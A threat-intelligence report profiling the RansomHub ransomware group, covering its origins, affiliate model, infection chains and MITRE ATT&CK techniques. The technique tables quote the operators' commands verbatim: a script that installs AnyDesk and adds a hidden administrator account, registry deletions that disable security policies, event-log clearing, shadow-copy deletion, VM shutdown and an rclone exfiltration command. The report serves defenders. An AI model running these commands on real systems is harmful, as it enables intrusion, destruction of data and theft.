Ransomware Spotlight: Ransomhub

December 20, 2024

RansomHub

By Trend Research

RansomHub is a young Ransomware-as-a-Service (RaaS) group tracked by Trend Micro as Water Bakunawa. Despite being a young ransomware group first detected in February 2024, RansomHub moves boldly by targeting larger enterprises more likely to pay ransoms.

$Ransomware Spotlight: RansomHub Infographic$ View infographic of "Ransomware Spotlight: RansomHub"

This Spotlight report has been updated on August 8, 2025, with additional data and insights from RansomHub activities observed from the fourth quarter of 2024 to the first half of 2025.

RansomHub is a Ransomware-as-a-Service (RaaS) group first detected in February 2024 and tracked by Trend Micro as Water Bakunawa. It quickly gained notoriety for their “big game hunting” tactic. They prey on victims who are more likely to pay large ransoms to mitigate the downtime on business operations caused by a ransomware attack. They target cloud storage backups and misconfigured Amazon S3 instances to threaten backup providers with data leaks, taking advantage of the trust between providers and their clients.

In March 2024, RansomHub added Change Healthcare to their list of victims. This company was previously targeted by BlackCat in an attack that made headlines when an affiliate accused the ransomware group otherwise known as ALPHV of pulling an exit scam, and later followed by the group going dark. It’s possible that RansomHub is a rebrand of the BlackCat ransomware group or that affiliates wronged in the alleged exit scam moved to RansomHub to collect the ransom money they believe they are owed. There are also reports indicating that BlackCat affiliates are joining the RansomHub group.

In November 2024, a new attack chain attributed to RansomHub was observed, with initial access likely gained through phishing emails containing malicious attachments. Once inside the environment, the attackers used obfuscated NODESTEALER Python scripts to deliver an encrypted XWORM file, which then loaded additional encrypted shellcode into memory and communicated with the command-and-control server. Throughout the attack chain, RansomHub leveraged PowerShell and Python scripts to download tools from GitHub and Dropbox links, with NODESTEALER and XWORM serving as key components in facilitating ransomware deployment.

The group’s observed activities in November 2024 also showed that cybercriminals behind RansomHub used a modified SCUT tool as part of its defense evasion strategy. This phase likely began with attackers compromising domain controllers and deploying Group Policy Objects (GPOs) that executed batch files across the network. To evade detection, they made use of uninstall tools from Trend Micro and CrowdStrike while relying on command-line file transfer utilities to copy files from shared network locations to local directories.

In another incident in the fourth quarter of 2024, a RansomHub affiliate was seen leveraging a Python-based backdoor to maintain access to compromised endpoints. Additionally, the SocGholish MaaS framework played a key role in enabling initial access to drop second-stage payloads, which include backdoor components to enable initial access for RansomHub ransomware-as-a-service (RaaS) affiliates.

Later in a February 2025 incident, the group was seen deploying disk wiping techniques on the victim’s machine and was also observed to use BitLocker pre-boot authentication to encrypt target drive and disable recovery and boot.

What organizations need to know about RansomHub ransomware

The RansomHub ransomware group (Water Bakunawa) recruits affiliates through the mostly Russian cybercriminal dark web forum RAMP. The ransomware group uses ransomware variants rewritten in GoLang to target Windows and Linux systems and uses C++ to target ESXi servers. The group adhered by strict rules: they do not attack non-profit organizations, and they do not target again victims who have already paid. They also avoid targeting members of the Commonwealth of Independent States (CIS), as well as Cuba, North Korea, and China.

RansomHub has been observed to promise sending a decryptor for free if an affiliate doesn't provide one after payment or if they mistakenly attack an off-limits organization. Affiliates keep 90% of the ransom, with the remaining 10% going to the main group.

There are also notable similarities between the RansomHub group and the Knight ransomware groups, also referred to as Cyclops ransomware. The management panel of RansomHub's RaaS operation shares design and feature similarities with the Knight RaaS panel. Cyclops is recognized as the operator of the Knight RaaS program and offered to sell the source code for Knight 3.0 ransomware on the RAMP cybercrime forum back in February 18, 2024. This offer included the source code for both the management panel and the ransomware, written in C++ and GoLang, languages also used for RansomHub's ransomware.

Interestingly, on February 12, 2024, days before the source code sale, the Knight RaaS Tor-based victim name-and-shame blog became inaccessible and remained so at the time of writing. Meanwhile, the RansomHub RaaS was launched around the same time. These connections suggest that the RansomHub ransomware may be a successor or substitute for the Knight ransomware group.

Yet another transfer is worth mentioning: DragonForce took over RansomHub in early 2025. RansomHub’s leak site went dark on March 31, and DragonForce effectively commandeered its infrastructure between that date until April 8, 2025, the same day that the public takeover was formally recognized. DragonForce then announced that RansomHub had “joined the cartel.” As a result, RansomHub is now considered inactive, last seen in breach reports from April this year. Following the takeover, several of RansomHub’s known affiliates were observed migrating to other ransomware groups.

Infection chain and techniques

The following section details the initial infection chain observed from RansomHub activity as illustrated in Figure 1.

$The RansomHub ransomware observed infection chain$

Figure 1: The RansomHub ransomware observed infection chain

Initial Access

The RansomHub ransomware group use spear-phishing voice scams for initial access. The cybercriminals use social engineering to orchestrate victim account password resets, employing speakers with a convincing American accent to lure victims. RansomHub also possibly uses compromised VPN accounts.

Execution

Operators behind RansomHub use PsExec to execute commands remotely on the victim’s machine. They have also been observed to use Powershell scripts to execute commands related to credential access, discover remote systems, establish SSH connections.
They have also been observed to use Python scripts to establish SSH connections, transfer the encryptor via Secure File Transfer Protocol (SFTP), and execute the encryptor simultaneously across multiple servers.

Persistence

RansomHub uses a local account to maintain access and adds the created user to administrator groups to maintain elevated access.

Defense Evasion

RansomHub drops and executes a batch file named disableAV.bat detected as Trojan.BAT.KAPROCHANDLER.A. It copies and executes the binary used to terminate and delete antivirus-related processes and files. The binary used, detected as STONESTOP, uses a signed driver, detected as POORTRY, to delete files and terminate processes that are related to antivirus products.
The ransomware also uses another batch file to delete multiple registry subkeys and entries intended to bypass virus and threat protection settings in Windows.
RansomHub also uses TDSSKiller to disable antivirus or EDR solutions in the target system and TOGGLEDEFENDER to disable Windows Defender.
The ransomware group also uses EDR Kill Shifter that functions as a loader executable that utilizes the Bring Your Own Vulnerable Driver (BYOVD) technique. It exploits different vulnerable drivers to disable EDR protection.
The ransomware group also uses IOBit Unlocker to unlock files and folders that are locked by other processes or programs.

Credential Access

RansomHub uses MIMIKATZ, LaZagne, and SecretServerSecretStealer to retrieve passwords and credentials on their victim’s machines.
The ransomware group has also been observed to exploit the Veeam Backup & Replication component vulnerability CVE-2023-27532, where they connected to the Veeam.Backup.Service.exe on TCP/9401, created a network share, and then created and executed a Powershell script to dump credentials from the Veeam database to a text file. The group was also seen using Veeamp which is a credential dumping tool specifically designed to extract credentials from a SQL database utilized by Veeam backup management software.
A sample from the ransomware group has also been observed to conduct a brute force attack on the domain controller which was followed by a ntlmv1 logon to the domain controller. The group has also been observed extracting the NTDS.dit file which is a database that stores the Active Directory data including users, groups, security descriptors and password hashes.
RansomHub also uses a PowerShell script that interacts with the CyberArk Privileged Access Security (PAS) solution to pull account information from safes and export it to a CSV file.

Discovery

RansomHub operators use NetScan to discover and retrieve information about network devices. They also use Advanced Port Scanner to scan for open ports on network computers.

Lateral Movement

RansomHub ransomware uses the cmd command xcopy/copy to transfer the binary and driver used to terminate and delete anti-virus related processes and files, respectively. The group employs a PowerShell script to connect to a vCenter Server, retrieve all ESXi hosts, and configures the SSH service on each host to start automatically, enabling external SSH connections. The script also has the capability to reset the ESXi root user password and then disconnect from the vCenter Server.
RansomHub operators also use a SMB spreader that uses Impacket, which was provided to RansomHub affiliates. The SMB spreader runs a specified ransomware executable over the affected system’s local network.
The group also used SFTP to transfer the encryptor.

Command and Control

RansomHub operators use Atera, Splashtop, AnyDesk, Ngrok, Screen Connect and Remmina to to gain access on victim machines remotely.

Impact

RansomHub ransomware uses two encryption algorithms to encrypt target files: ECDH and AES. The ransomware then appends the 32-byte master public key from its configuration to the end of each encrypted file. The ransomware binary requires a -pass argument with a 32-byte passphrase to be specified when the ransomware is executed. The 32-byte passphrase is used to decrypt an embedded configuration during runtime which contains the file extensions, file names, and folders to avoid, processes and services to terminate, as well as compromised login accounts.

Exfiltration

RansomHub ransomware has been detected using the third-party tool and web-service RClone to exfiltrate to stolen information.

Figures 2 and 3 illustrate the RansomHub infection chain from its observed campaigns in the fourth quarter of 2024.

Figure 2. The RansomHub infection chain that uses NODESTEALER and XWORM

Figure 3. RansomHub infection that uses a modified Secure Common Uninstall Tool (SCUT)

The following section details RansomHub infection chains that we investigated from the group’s observed campaigns in the fourth quarter of 2024.

Initial Access

RansomHub operators in their campaigns in the second half of 2024 until early 2025 were observed to use SocGholish which typically utilizes drive-by compromises and social engineering tactics to trick users into downloading a malicious JavaScript payload masquerading as a browser update. After the execution of the initial payload, the malware establishes a command-and-control (C&C) channel, allowing adversaries to perform further malicious actions.

Execution

RansomHub operators used Winhelper.ps1, x.ps1 and vcruntime.py to download and execute files and scripts from a GitHub repository.

Privilege Escalation

The RansomHub campaigns from the second half of 2024 to early 2025 showed the use of PowerRun, which is designed to run programs with TrustedInstaller (TI) privileges that usually provide higher permissions compared to Administrator privileges. This tool exploits Windows commands to elevate privileges and bypass standard security controls.

Credential Access

RansomHub uses NODESTEALER to retrieve browser cookies and login credentials from the victim’s system.

Discovery

RansomHub operators also use nbtscan to conduct internal reconnaissance within a compromised network. It can also be used to scan IP networks, list NetBIOS computer names, collect MAC addresses, and list active users on a system.

Command and Control

RansomHub also uses XWORM to connect to a command and control server, COBEACON for command execution and other functions, Python SOCKS5 Proxy Client to maintain access to compromised endpoints and deploy encryptors, Betruger for the uploading of files to the C&C server and other functions, and Configure-SMRemoting to configure and enable PowerShell remoting on Windows systems.

Defense Evasion

RansomHub threat actors were observed using a modified version of the legitimate Secure Common Uninstall Tool (SCUT) to remove the verification of the JWT token and whether the process was launched by a Trend Micro process. This modification allows attackers to mimic legitimate processes and perform malicious actions.
RansomHub threat actors also used AMSI Bypass Patcher to alter the behavior of the AmsiScanBuffer function by locating and altering the memory address of the AmsiScanBuffer function within amsi.dll, which then allows potentially malicious code to bypass AMSI's detection mechanisms and execute without being flagged.
The RansomHub ransomware group also used GMER to detect and remove toolkits, as well as Uninstall-CS-ISG.bat, which is a batch file disguised as a CrowdStrike uninstall script, to transfer tools, uninstall CrowdStrike and Apex One agents, and execute the ransomware payload.

Exfiltration

RansomHub threat actors in their observed campaigns from the second half of 2024 to early 2025 used MEGAsync, which is an installable application that synchronizes folders between computers and MEGA Cloud Drives.

Impact

RansomHub actors used VeraCrypt to encrypt backup storage devices.

MITRE tactics and techniques

In this section, we detail two MITRE tactics and techniques from the different campaigns we have observed from the RansomHub ransomware family. The first table enumerates the different MITRE tactics that the ransomware family used in its first observed campaign in the first half of 2024.

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Command and Control	Impact	Exfiltration
T1078 - Valid Accounts The ransomware group could have possibly used compromised VPN accounts. T1566.004 - Phishing: Spearphishing Voice Based on external reports, the ransomware group uses social engineering to orchestrate victim account password resets, particularly with American-accented speakers	T1059.001 - Command and Scripting Interpreter: PowerShell • Based on external reports, the ransomware group uses PowerShell scripts to execute commands related to credential access, discover remote systems, and enable SSH service. • The ransomware group also used a PowerShell script to download AnyDesk: Function AnyDesk { mkdir "C:\ProgramData\AnyDesk" # Download AnyDesk $clnt = new-object System.Net.WebClient $url = "hxxp://download[.]anydesk[.]com/AnyDesk.exe" $file = "C:\ProgramData\AnyDesk.exe" $clnt.DownloadFile($url,$file) cmd.exe /c C:\ProgramData\AnyDesk.exe --install C:\ProgramData\AnyDesk --start-with-win --silent cmd.exe /c echo {redacted} \| C:\ProgramData\anydesk.exe --set-password net user {redacted} "{redacted}" /add net localgroup Administrators {redacted} /ADD reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v {redacted} /t REG_DWORD /d 0 /f cmd.exe /c C:\ProgramData\AnyDesk.exe --get-id } T1059.006 - Command and Scripting Interpreter: Python Based on external reports, the ransomware group utilizes a customized Python script to establish an SSH connection with targeted ESXi servers, transfer the encryptor via SFTP, confirm the successful transfer, and execute the encryptor simultaneously across multiple servers. T1059.003 - Command and Scripting Interpreter: Windows Command Shell The ransomware binary accepts the following parameters: Other versions of the RansomHub accepts the following command line parameters: It can also execute supplied commands before its encryption routine by using the -cmd {command to execute} parameter.	T1136.001 - Create Account: Local Account The ransomware group was able to execute command via the net command-line utility to create a local account, maintaining access to victim systems. T1098 - Account Manipulation The ransomware group was able to execute command via the net command-line utility to add created user account to the administrator groups to maintain elevated access. T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder If -safeboot is passed as an argument, the ransomware binary adds the following entries to the SOFTWARE\Microsoft\Windows NT\CurrentVersion\RunOnce registry key to execute itself upon reboot: zCCyEs = {Malware File Path}\{Malware File Name} -safeboot-instance -pass {32-byte passphrase} T1547* - Boot or Logon Autostart Execution • The ransomware binary enables automatic logon by adding the following registry entries in the SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon. • The credentials are then saved to a text file named user.txt. The login information is also displayed in the console. AutoAdminLogon = 1 DefaultUserName = Administrator DefaultDomainName = DefaultPassword = {random characters}	T1078.003 - Valid Accounts: Local Accounts If -safeboot is passed as an argument, the ransomware binary attempts to login as the administrator using the compromised usernames and passwords included in the credentials key in the encrypted configuration using the API LogonUserW. If the login attempt fails it enables automatic logon. T1134.001 - Access Token Manipulation: Token Impersonation/Theft The ransomware binary can impersonate a logged-on user's security context using a call to the ImpersonateLoggedOnUser API.	T1480 - Execution Guardrails The ransomware binary requires a -pass argument with a 32 byte passphrase to be specified when the ransomware is executed. If the wrong password is supplied, the RansomHub sample will not properly execute and will instead print bad config to the console. T1112 - Modify Registry Based on external reports, The ransomware group removes various registry subkeys and entries to bypass virus and threat protection settings in Windows: reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies" /f reg delete "HKCU\Software\Microsoft\WindowsSelfHost" /f reg delete "HKCU\Software\Policies" /f reg delete "HKLM\Software\Microsoft\Policies" /for reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\PColicies" /f reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Windows Store\Windows Update" /f reg delete "HKLM\Software\Microsoft\WindowsSelfHost" /f reg delete "HKLM\Software\Policies" /f reg delete "HKLM\Software\WOW6432Node\Microsoft\Policies" /for reg delete "HKLM\Software\WOW6432Node\Microsoft\Windows\\CurrentVersion\Policies" /f reg delete "HKLM\Software\WOW6432Node\Microsoft\Windows\\CurrentVersion\Windows Store\Windows Update" /f T1027.013 - Obfuscated Files or Information: Encrypted/Encoded File The ransomware binary used an encrypted configuration which will be decrypted at runtime using the 32-byte passphrase used during command line execution. It also contains configurable settings that exist under the settings key in the encrypted configuration. T1564.003 - Hide Artifacts: Hidden Window The ransomware binary has used the API ShowWindow to hide the console window. T1070.001 - Clear Windows Event Logs Using the API CreateProcessW, the ransomware binary clears windows event logs using the following utility commands: • cmd.exe /c wevtutil cl security • cmd.exe /c wevtutil cl system • cmd.exe /c wevtutil cl application The ransomware group also used a batch file named LogDel.bat to clear Windows event logs. List of cleared logs in the IoCs T1562.006 - Impair Defenses: Indicator Blocking The ransomware binary uses the API SetErrorMode with 0x8003 as an argument to prevent the system from displaying any error on the screen. T1222.001 - Windows File and Directory Permissions Modification It executes the following commands to allow remote symbolic links to point to local resources: cmd.exe /c "fsutil behavior set SymlinkEvaluation R2L:1" cmd.exe /c "fsutil behavior set SymlinkEvaluation R2R:1" LogDel.bat was used to modify the attributes of the default.rdp by removing the system and hidden attributes. attrib  Default.rdp -s -h T1562.009 - Impair Defenses: Safe Mode Boot If -safeboot is passed as an argument, the ransomware binary can reboot the victim's machine in safe mode with networking by executing the following processes using the API CreateProcessW. bcdedit /set {default} safeboot network	T1003 - OS Credential Dumping After it connects to Veeam.Backup.Service.exe on TCP/9401, it creates a network share using the net command-line utility then it creates a Powershell script on the network share executed to dump credentials from the Veeam database. The dumped credentials are then saved to a text file. T1003.003 - OS Credential Dumping: NTDS The ransomware group was observed to be extracting the NTDS.dit file. T1110 - Brute Force The ransomware group conducted brute force attack on the domain controller which was followed by an ntlmv1 logon to the domain controller. T1110.003 - Brute Force: Password Spraying The ransomware group used a batch file named 232.bat to perform password spraying. T1003.001 - OS Credential Dumping: LSASS Memory The ransomware group performed credential dumping through the LSASS task manager dump. T1555.005 - Credentials from Password Stores: Password Managers Based on external reports, the ransomware group used a PowerShell script that interacts with the CyberArk Privileged Access Security (PAS) solution to pull account information from safes and export it to a CSV file.	T1057 - Process Discovery The ransomware binary uses the APIs Process32FirstW and Process32NextW to search for processes that it will terminate listed in its configuration, kill_processes. See the list of kill_processes here. T1082 - System Information Discovery The ransomware binary uses the API GetLogicalDriveStringsW to enumerate all mounted drives, and GetDriveTypeW to determine the drive type. T1083 - File and Directory Discovery The ransomware binary uses the API FindFirstFileW and FindNextFileW to search for files and folders that it will encrypt and to avoid whitelisted files and folders. Click to see the list of white-folders and white_files. T1082 - System Information Discovery The ransomware binary attempts to determine if it is operating in a WINE environment by using the GetProcAddress API to check for the presence of the wine_get_version function. T1087.001 - Account Discovery: Local Account The ransomware binary uses the API NetUserEnum to enumerate local accounts. T1135 - Network Share Discovery The ransomware binary uses the API NetShareEnum to discover and encrypt shared resources on the compromised hosts.	T1570 - Lateral Tool Transfer The ransomware binary uses the cmd command xcopy/copy to transfer the binary and driver used to terminate and delete anti-virus-related processes and files, respectively. T1021.004 - Remote Services: SSH Based on external reports, the ransomware group employed a PowerShell script to connect to a vCenter Server, retrieve all ESXi hosts, and configure the SSH service on each host to start automatically, enabling external SSH connections. The script also has the capability to reset the ESXi root user password and then disconnect from the vCenter Server.	T1105 - Ingress Tool Transfer Based on external reports, the ransomware group uses SFTP to transfer the encryptor.	T1486 - Data Encrypted for Impact It avoids encrypting files with the following file extensions: *• .deskthemepack • .themepack* *• .theme • .msstyles* *• .exe • .drv* *• .msc • .dll* *• .lock • .sys* *• .msu • .lnk* *• .ps1 • .iso* *• .inf • .cab* *• .386 It avoids encrypting files with the following strings in their file name: • NTUSER.DAT • autorun.inf • boot.ini • desktop.ini • thumbs.db • It avoids encrypting files found in the folders in this list of white_folders. • It appends the first six characters of the master public key as a file extension to the encrypted file. • It empties the recycle bin of the affected machine. • It drops the following ransom notes: {Encrypted directory}\README_{first six characters of the master public key}.txt • It uses two encryption algorithms to encrypt target files, ECDH and AES. The ransomware then appends the 32-byte master public key from its configuration to the end of each encrypted file. It has an embedded configuration, decrypted during runtime, which contains the file extensions, file names, and folders to avoid. T1490 -  Inhibit System Recovery The ransomware binary executes the following command to delete shadow copies: powershell.exe -Command Powershell -Command "\"Get-CimInstance Win32_ShadowCopy \| Remove-CimInstance\"" T1489 - Service Stop The ransomware binary executes the following commands to stop all virtual machines running on a Hyper-V host: powershell.exe -Command PowerShell -Command "\"Get-VM \| Stop-VM -Force\"" The ransomware binary also stops all the IIS services using the following command: cmd.exe /c iisreset.exe /stop The ransomware binary uses the API ControlService with dwControl set to 1 (SERVICE_CONTROL_STOP) to terminate services included in its configuration, kill_services. See the list of kill-services here. T1529 - System Shutdown/Reboot If -safeboot is passed as an argument, the ransomware binary issues the following command to reboot a system: cmd.exe /c shutdown /r /f /t 0**	T1567.002 - Exfiltration to Cloud Storage Using RClone, the group exfiltrated files via the following command: rclone copy \\{redacted}\i$ {redacted}\Users --include ".pdf" --include ".xls" --include ".xlsx" --include ".doc" --include ".msg" --include ".rtf" --include ".mdb" --include ".db" --include ".csv" --include ".docx" --include ".jpg" --include ".png" --include ".dot" --include ".wbk" --include ".docm" --include ".dotx" --include ".xlt" --include ".xlm" --include ".accdb" --include ".sql" --include ".pst" --include ".jpeg" --include ".xlsm" --include ".xlsb" --include ".xlr" --include ".sqb" --include ".sq" --include ".DCM" --include "*.tif" --max-age 2020-01-01

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Command and Control

Impact

Exfiltration

T1078 - Valid Accounts
The ransomware group could have possibly used compromised VPN accounts.

T1566.004 - Phishing: Spearphishing Voice
Based on external reports, the ransomware group uses social engineering to orchestrate victim account password resets, particularly with American-accented speakers

T1059.001 - Command and Scripting Interpreter: PowerShell
• Based on external reports, the ransomware group uses PowerShell scripts to execute commands related to credential access, discover remote systems, and enable SSH service.
• The ransomware group also used a PowerShell script to download AnyDesk:
Function AnyDesk { mkdir "C:\ProgramData\AnyDesk" # Download AnyDesk $clnt = new-object System.Net.WebClient $url = "hxxp://download[.]anydesk[.]com/AnyDesk.exe" $file = "C:\ProgramData\AnyDesk.exe" $clnt.DownloadFile($url,$file) cmd.exe /c C:\ProgramData\AnyDesk.exe --install C:\ProgramData\AnyDesk --start-with-win --silent cmd.exe /c echo {redacted} | C:\ProgramData\anydesk.exe --set-password net user {redacted} "{redacted}" /add net localgroup Administrators {redacted} /ADD reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v {redacted} /t REG_DWORD /d 0 /f cmd.exe /c C:\ProgramData\AnyDesk.exe --get-id }

T1059.006 - Command and Scripting Interpreter: Python
Based on external reports, the ransomware group utilizes a customized Python script to establish an SSH connection with targeted ESXi servers, transfer the encryptor via SFTP, confirm the successful transfer, and execute the encryptor simultaneously across multiple servers.

T1059.003 - Command and Scripting Interpreter: Windows Command Shell
The ransomware binary accepts the following parameters:

Other versions of the RansomHub accepts the following command line parameters:

It can also execute supplied commands before its encryption routine by using the -cmd {command to execute} parameter.

T1136.001 - Create Account: Local Account
The ransomware group was able to execute command via the net command-line utility to create a local account, maintaining access to victim systems.

T1098 - Account Manipulation
The ransomware group was able to execute command via the net command-line utility to add created user account to the administrator groups to maintain elevated access.

T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
If -safeboot is passed as an argument, the ransomware binary adds the following entries to the SOFTWARE\Microsoft\Windows NT\CurrentVersion\RunOnce registry key to execute itself upon reboot:
*zCCyEs = {Malware File Path}\{Malware File Name} -safeboot-instance -pass {32-byte passphrase}

T1547 - Boot or Logon Autostart Execution
• The ransomware binary enables automatic logon by adding the following registry entries in the SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon.
• The credentials are then saved to a text file named user.txt. The login information is also displayed in the console.
AutoAdminLogon = 1
DefaultUserName = Administrator
DefaultDomainName =
DefaultPassword = {random characters}

T1078.003 - Valid Accounts: Local Accounts
If -safeboot is passed as an argument, the ransomware binary attempts to login as the administrator using the compromised usernames and passwords included in the credentials key in the encrypted configuration using the API LogonUserW. If the login attempt fails it enables automatic logon.

T1134.001 - Access Token Manipulation: Token Impersonation/Theft
The ransomware binary can impersonate a logged-on user's security context using a call to the ImpersonateLoggedOnUser API.

T1480 - Execution Guardrails
The ransomware binary requires a -pass argument with a 32 byte passphrase to be specified when the ransomware is executed. If the wrong password is supplied, the RansomHub sample will not properly execute and will instead print bad config to the console.

T1112 - Modify Registry
Based on external reports, The ransomware group removes various registry subkeys and entries to bypass virus and threat protection settings in Windows:
reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies" /f
reg delete "HKCU\Software\Microsoft\WindowsSelfHost" /f
reg delete "HKCU\Software\Policies" /f
reg delete "HKLM\Software\Microsoft\Policies" /for
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\PColicies" /f
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Windows Store\Windows Update" /f
reg delete "HKLM\Software\Microsoft\WindowsSelfHost" /f
reg delete "HKLM\Software\Policies" /f
reg delete "HKLM\Software\WOW6432Node\Microsoft\Policies" /for
reg delete "HKLM\Software\WOW6432Node\Microsoft\Windows\\CurrentVersion\Policies" /f
reg delete "HKLM\Software\WOW6432Node\Microsoft\Windows\\CurrentVersion\Windows Store\Windows Update" /f

T1027.013 - Obfuscated Files or Information: Encrypted/Encoded File
The ransomware binary used an encrypted configuration which will be decrypted at runtime using the 32-byte passphrase used during command line execution. It also contains configurable settings that exist under the settings key in the encrypted configuration.

T1564.003 - Hide Artifacts: Hidden Window
The ransomware binary has used the API ShowWindow to hide the console window.

T1070.001 - Clear Windows Event Logs
Using the API CreateProcessW, the ransomware binary clears windows event logs using the following utility commands:
• cmd.exe /c wevtutil cl security
• cmd.exe /c wevtutil cl system
• cmd.exe /c wevtutil cl application
The ransomware group also used a batch file named LogDel.bat to clear Windows event logs.
List of cleared logs in the IoCs

T1562.006 - Impair Defenses: Indicator Blocking
The ransomware binary uses the API SetErrorMode with 0x8003 as an argument to prevent the system from displaying any error on the screen.

T1222.001 - Windows File and Directory Permissions Modification
It executes the following commands to allow remote symbolic links to point to local resources:
cmd.exe /c "fsutil behavior set SymlinkEvaluation R2L:1"
cmd.exe /c "fsutil behavior set SymlinkEvaluation R2R:1"
LogDel.bat was used to modify the attributes of the default.rdp by removing the system and hidden attributes.
attrib  Default.rdp -s -h

T1562.009 - Impair Defenses: Safe Mode Boot
If -safeboot is passed as an argument, the ransomware binary can reboot the victim's machine in safe mode with networking by executing the following processes using the API CreateProcessW.
bcdedit /set {default} safeboot network

T1003 - OS Credential Dumping
After it connects to Veeam.Backup.Service.exe on TCP/9401, it creates a network share using the net command-line utility then it creates a Powershell script on the network share executed to dump credentials from the Veeam database. The dumped credentials are then saved to a text file.

T1003.003 - OS Credential Dumping: NTDS
The ransomware group was observed to be extracting the NTDS.dit file.

T1110 - Brute Force
The ransomware group conducted brute force attack on the domain controller which was followed by an ntlmv1 logon to the domain controller.

T1110.003 - Brute Force: Password Spraying
The ransomware group used a batch file named 232.bat to perform password spraying.

T1003.001 - OS Credential Dumping: LSASS Memory
The ransomware group performed credential dumping through the LSASS task manager dump.

T1555.005 - Credentials from Password Stores: Password Managers
Based on external reports, the ransomware group used a PowerShell script that interacts with the CyberArk Privileged Access Security (PAS) solution to pull account information from safes and export it to a CSV file.

T1057 - Process Discovery
The ransomware binary uses the APIs Process32FirstW and Process32NextW to search for processes that it will terminate listed in its configuration, kill_processes.
See the list of kill_processes here.

T1082 - System Information Discovery
The ransomware binary uses the API GetLogicalDriveStringsW to enumerate all mounted drives, and GetDriveTypeW to determine the drive type.

T1083 - File and Directory Discovery
The ransomware binary uses the API FindFirstFileW and FindNextFileW to search for files and folders that it will encrypt and to avoid whitelisted files and folders.
Click to see the list of white-folders and white_files.

T1082 - System Information Discovery
The ransomware binary attempts to determine if it is operating in a WINE environment by using the GetProcAddress API to check for the presence of the wine_get_version function.

T1087.001 - Account Discovery: Local Account
The ransomware binary uses the API NetUserEnum to enumerate local accounts.

T1135 - Network Share Discovery
The ransomware binary uses the API NetShareEnum to discover and encrypt shared resources on the compromised hosts.

T1570 - Lateral Tool Transfer
The ransomware binary uses the cmd command xcopy/copy to transfer the binary and driver used to terminate and delete anti-virus-related processes and files, respectively.

T1021.004 - Remote Services: SSH
Based on external reports, the ransomware group employed a PowerShell script to connect to a vCenter Server, retrieve all ESXi hosts, and configure the SSH service on each host to start automatically, enabling external SSH connections. The script also has the capability to reset the ESXi root user password and then disconnect from the vCenter Server.

T1105 - Ingress Tool Transfer
Based on external reports, the ransomware group uses SFTP to transfer the encryptor.

T1486 - Data Encrypted for Impact
It avoids encrypting files with the following file extensions:
• *.deskthemepack
• *.themepack
• *.theme
• *.msstyles
• *.exe
• *.drv
• *.msc
• *.dll
• *.lock
• *.sys
• *.msu
• *.lnk
• *.ps1
• *.iso
• *.inf
• *.cab
• *.386

It avoids encrypting files with the following strings in their file name:
• NTUSER.DAT
• autorun.inf
• boot.ini
• desktop.ini
• thumbs.db

• It avoids encrypting files found in the folders in this list of white_folders.
• It appends the first six characters of the master public key as a file extension to the encrypted file.
• It empties the recycle bin of the affected machine.
• It drops the following ransom notes:
{Encrypted directory}\README_{first six characters of the master public key}.txt
• It uses two encryption algorithms to encrypt target files, ECDH and AES. The ransomware then appends the 32-byte master public key from its configuration to the end of each encrypted file. It has an embedded configuration, decrypted during runtime, which contains the file extensions, file names, and folders to avoid.

T1490 -  Inhibit System Recovery
The ransomware binary executes the following command to delete shadow copies:
powershell.exe -Command Powershell -Command "\"Get-CimInstance Win32_ShadowCopy | Remove-CimInstance\""

T1489 - Service Stop
The ransomware binary executes the following commands to stop all virtual machines running on a Hyper-V host:
powershell.exe -Command PowerShell -Command "\"Get-VM | Stop-VM -Force\""
The ransomware binary also stops all the IIS services using the following command:
cmd.exe /c iisreset.exe /stop
The ransomware binary uses the API ControlService with dwControl set to 1 (SERVICE_CONTROL_STOP) to terminate services included in its configuration, kill_services.
See the list of kill-services here.

T1529 - System Shutdown/Reboot
If -safeboot is passed as an argument, the ransomware binary issues the following command to reboot a system:
cmd.exe /c shutdown /r /f /t 0

T1567.002 - Exfiltration to Cloud Storage
Using RClone, the group exfiltrated files via the following command:
rclone copy \\{redacted}\i$ {redacted}\Users --include ".pdf" --include ".xls" --include ".xlsx" --include ".doc" --include ".msg" --include ".rtf" --include ".mdb" --include ".db" --include ".csv" --include ".docx" --include ".jpg" --include ".png" --include ".dot" --include ".wbk" --include ".docm" --include ".dotx" --include ".xlt" --include ".xlm" --include ".accdb" --include ".sql" --include ".pst" --include ".jpeg" --include ".xlsm" --include ".xlsb" --include ".xlr" --include ".sqb" --include ".sq" --include ".DCM" --include "*.tif" --max-age 2020-01-01

The following table details the MITRE tactics from its campaigns in the fourth quarter of 2024; while there are similarities with the TTPs used in the groups previous campaign in March 2024, there are also key differences that show how threat actors are continuously adapting more sophisticated techniques to circumnavigate defenses.

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Impact
